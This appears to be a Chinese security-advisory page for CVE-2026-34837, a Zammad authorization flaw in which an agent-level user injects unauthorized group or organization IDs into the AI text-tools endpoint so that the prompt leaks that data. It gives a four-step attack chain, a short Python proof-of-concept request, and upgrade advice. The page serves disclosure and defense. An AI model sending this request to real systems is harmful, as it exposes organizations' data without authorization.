CVE-2026-34837 CVSS 4.3 中危

CVE-2026-34837 Zammad权限绕过漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34837

漏洞类型

权限控制

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Zammad

漏洞概述

Zammad 7.0.1 之前版本存在授权失败漏洞。拥有 ticket.agent 权限的攻击者可通过 POST /api/v1/ai_assistance/text_tools/:id 端点，利用未授权的上下文数据（如群组或组织）生成 AI 提示词，导致信息泄露。

技术细节

该漏洞是由于 Zammad 在处理 AI 辅助功能请求时，未对上下文数据进行严格的权限校验。攻击者只需具备 ticket.agent 权限，即可构造请求并指定任意群组或组织 ID 作为上下文。系统未验证用户是否对这些资源具有访问权限，便将其包含在发送给 AI 模型的提示词中。这使得攻击者能够利用 AI 的响应间接获取本无权访问的敏感组织结构或数据信息。

攻击链分析

STEP 1

1. 身份认证

攻击者注册或获取一个具有 ticket.agent 权限的低权限账户。

STEP 2

2. 探测端点

确认目标系统存在 /api/v1/ai_assistance/text_tools/:id 接口。

STEP 3

3. 构造恶意请求

向该接口发送 POST 请求，并在上下文中注入攻击者无权访问的群组或组织 ID。

STEP 4

4. 权限绕过与信息泄露

系统未校验权限，将敏感数据包含在 AI 提示词中处理，攻击者通过响应获取信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

url = "https://target.com/api/v1/ai_assistance/text_tools/1"
headers = {"Authorization": "Bearer <agent_token>"}

# Payload containing unauthorized group/org IDs
payload = {
    "context": {
        "group_id": 999, 
        "organization_id": 888
    },
    "prompt": "Analyze this context"
}

r = requests.post(url, json=payload, headers=headers)
print(r.text)

影响范围

Zammad < 7.0.1

防御指南

临时缓解措施

建议立即将 Zammad 升级到 7.0.1 版本以修复此漏洞。如果无法立即升级，应考虑暂时禁用 AI 辅助功能，并密切监控是否存在异常的 API 调用行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表